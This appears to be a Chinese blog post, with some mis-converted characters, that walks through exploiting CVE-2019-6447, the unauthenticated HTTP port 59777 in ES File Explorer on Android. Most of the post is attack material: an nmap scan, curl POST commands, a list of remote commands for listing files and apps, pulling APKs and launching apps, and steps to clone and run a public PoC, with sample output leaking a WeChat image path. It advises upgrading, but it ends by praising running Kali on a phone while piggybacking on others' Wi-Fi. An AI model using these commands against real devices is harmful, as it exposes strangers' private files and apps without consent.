ES文件管理器未受權訪問漏洞——CVE-2019-6447

ES文件管理器號稱安卓文件管理器第一品牌,主動下載達3億次,做者我也在用。
每次用戶啓動應用時都會啓動http服務器,打開的本地端口爲59777,直接訪問會彈出權限被拒絕
ES文件管理器未受權訪問漏洞——CVE-2019-6447
漏洞影響範圍
ES文件管理器版本號4.1.9.7.4或者更低
漏洞復現
直接nmap掃描手機指定端口
nmap 192.168.0.108 59777
ES文件管理器未受權訪問漏洞——CVE-2019-6447
能夠看到端口是已經開啓的
咱們能夠直接curl也能夠進行復現
curl命令:curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://192.168.0.108:59777
listPics能夠替換成想要使用的命令
可用命令
listFiles:列出全部文件
listPics:列出全部的圖片
listVideos:列出全部視頻
listAudios:列出全部的音頻文件
listApps:列出全部已安裝的應用
listAppsSystem:列出全部系統應用
listAppsPhone:列出全部電話應用程序
listAppsSdcard:列出sdcard中全部的apk文件
listAppsAll :列出全部已安裝的應用(包括系統應用)
getDeviceInfo:獲取設備信息
appPull :從設備中提取應用,須要包名稱參數
appLaunch:啓動應用程序,須要包名稱參數
getAppThumbnail:獲取應用程序的圖標,須要包名稱參數
上處命令位置爲包路徑下的4.1.84class2.-dex2jar.jar\com\estrongs\android\f\a.class
ES文件管理器未受權訪問漏洞——CVE-2019-6447
poc腳本
git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
pip install -r requirements.txt
python poc.py --cmd listPics --ip 192.168.0.108(listPics也能夠替換本身要使用的命令)
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }(出現此內容爲復現成功)python

更新最新版es文件管理器便可修復(低於4.1.9.9的版本需儘快升級爲最新版)linux

ps:配合linuxdeploy在手機上部署kali環境簡直無敵,只須要蹭下網就odkk了android

相關文章
相關標籤/搜索